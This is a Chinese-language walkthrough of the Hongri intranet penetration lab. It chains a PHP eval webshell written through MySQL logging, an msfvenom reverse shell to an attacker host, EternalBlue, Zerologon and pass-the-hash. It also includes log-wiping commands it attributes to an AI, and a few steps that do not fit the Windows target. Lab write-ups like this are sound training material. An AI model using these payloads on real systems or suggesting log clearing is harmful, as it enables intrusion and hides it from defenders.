1. 红日靶场环境搭建与网络拓扑配置红日靶场是一个模拟企业内网环境的实战平台特别适合新手学习内网渗透技术。我们先从最基础的环境搭建开始手把手教你如何配置虚拟机和网络。1.1 虚拟机准备与下载红日靶场官方提供了完整的虚拟机镜像包包含以下组件攻击机Kali Linux 2023.3建议分配4GB内存靶机1Windows 732位系统建议分配2GB内存靶机2Windows Server 2003建议分配1GB内存域控制器Windows Server 2008 R2建议分配2GB内存下载完成后建议使用VMware Workstation打开这些虚拟机。我第一次搭建时犯了个错误——直接解压后启动虚拟机结果发现网络配置有问题。后来发现需要先编辑虚拟机设置确保网卡模式正确# Kali攻击机需要两张网卡 - 网卡1NAT模式用于上网下载工具 - 网卡2VMnet1Host-Only模式 # Windows靶机统一使用VMnet2Host-Only模式1.2 网络配置关键步骤配置完虚拟机后需要检查各机器的IP地址是否在同一个网段。这里有个小技巧在Kali中可以使用arp-scan快速发现内网存活主机arp-scan -l --interfaceeth1如果发现IP分配不正常可能需要手动修改VMware的虚拟网络编辑器。我遇到过VMnet1和VMnet2的IP段冲突问题解决方法是在VMware的编辑-虚拟网络编辑器中将VMnet1的子网IP改为192.168.72.0VMnet2改为192.168.52.0。注意Windows Server 2008域控的默认密码是hongrisec2019但有些版本可能需要使用hongri2024。如果登录失败可以尝试这两个密码。2. 初始渗透从外网到内网突破2.1 信息收集与漏洞扫描首先从Kali对Win7靶机进行扫描。使用Nmap进行基础扫描nmap -sV -p- 192.168.72.131发现开放了80和3306端口。进一步扫描Web目录dirb http://192.168.72.131发现存在phpMyAdmin目录这是个常见的突破点。我在这里踩过坑——直接尝试弱密码登录多次导致IP被临时封锁。后来发现可以先检查phpinfo页面/phpinfo.php获取服务器配置信息。2.2 MySQL日志注入Getshell通过phpMyAdmin登录默认root/root执行以下SQL语句开启日志记录SET GLOBAL general_logon; SET GLOBAL general_log_fileC:\\phpStudy\\WWW\\shell.php;然后用Weevely生成PHP后门weevely generate password123 shell.php将生成的shell.php内容通过SQL语句写入SELECT ?php eval($_POST[cmd]); ?;访问http://192.168.72.131/shell.php使用Weevely连接weevely http://192.168.72.131/shell.php password1233. 横向移动从单机到域控3.1 权限提升与信息收集拿到Webshell后首先检查当前权限whoami如果是普通用户可以尝试以下方法提权查找SUID文件find / -perm -4000 2/dev/null检查计划任务crontab -l查找配置文件中的密码grep -r password /var/www/在Win7靶机上我发现phpStudy服务是以管理员权限运行的于是直接上传MSF生成的exe后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.72.200 LPORT4444 -f exe shell.exe3.2 内网信息收集技巧拿到Meterpreter会话后先进行基础信息收集# 获取网络配置 ipconfig /all # 查看域信息 net config workstation # 查询域管理员 net group Domain Admins /domain特别有用的一个命令是net view可以查看当前域内的机器列表。我常用这个命令配合ping扫描快速定位域控for /f %i in (net view ^| findstr \\) do ping -n 1 %i4. 域控突破从普通域用户到域管理员4.1 利用MS17-010横向移动发现内网存在Windows Server 2003192.168.52.141后尝试永恒之蓝漏洞use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.52.141 exploit如果直接攻击失败可能需要先添加路由run autoroute -s 192.168.52.0/24然后通过Socks代理进行扫描# 在MSF中启动Socks代理 use auxiliary/server/socks_proxy set SRVHOST 0.0.0.0 set SRVPORT 1080 run # 在另一个终端使用proxychains扫描 proxychains nmap -sT -Pn 192.168.52.1414.2 Zerologon漏洞攻破域控针对Windows Server 2008域控192.168.52.138使用Zerologon漏洞重置密码python3 set_empty_pw.py owa 192.168.52.138成功后使用impacket工具获取域控权限secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 god.org/owa$192.168.52.138获取到管理员哈希后使用wmiexec.py进行交互wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:db4371323f83b0ad7f16ea72eb1fcd73 god.org/administrator192.168.52.1385. AI辅助排错实战经验在实际渗透过程中遇到问题可以借助AI工具快速解决。以下是几个典型场景5.1 错误排查案例问题使用MS17-010漏洞攻击时返回Target is not vulnerable解决通过AI分析可能原因目标系统已打补丁网络连接不稳定SMB服务版本不匹配验证方法nmap --script smb-vuln-ms17-010 192.168.52.1415.2 自动化脚本编写当需要批量操作时可以用AI帮助生成脚本。例如批量检查内网MS17-010漏洞import os import sys targets [192.168.52.138, 192.168.52.141] for target in targets: cmd fnmap --script smb-vuln-ms17-010 {target} os.system(cmd)5.3 日志清理技巧完成渗透后记得清理日志。AI建议的 PowerShell 命令# 清除系统日志 wevtutil cl System wevtutil cl Security wevtutil cl Application # 清除IIS日志 Remove-Item C:\inetpub\logs\LogFiles\* -Recurse -Force6. 防御建议与总结6.1 企业防御措施根据这次渗透经验建议企业采取以下防护措施及时打补丁MS17-010和Zerologon漏洞都有官方补丁最小权限原则MySQL等服务不要使用root权限运行网络分段将重要服务器放在独立VLAN日志监控实时监控异常登录行为6.2 渗透测试学习建议对于初学者我的经验是先理解原理再动手操作遇到错误时先看报错信息善用搜索引擎和AI工具每次测试后做完整记录红日靶场02比01版本增加了域环境对学习内网渗透非常有帮助。我在实际测试中发现从外网到内网、从普通用户到域控的完整链条能让人真正理解企业内网的安全风险。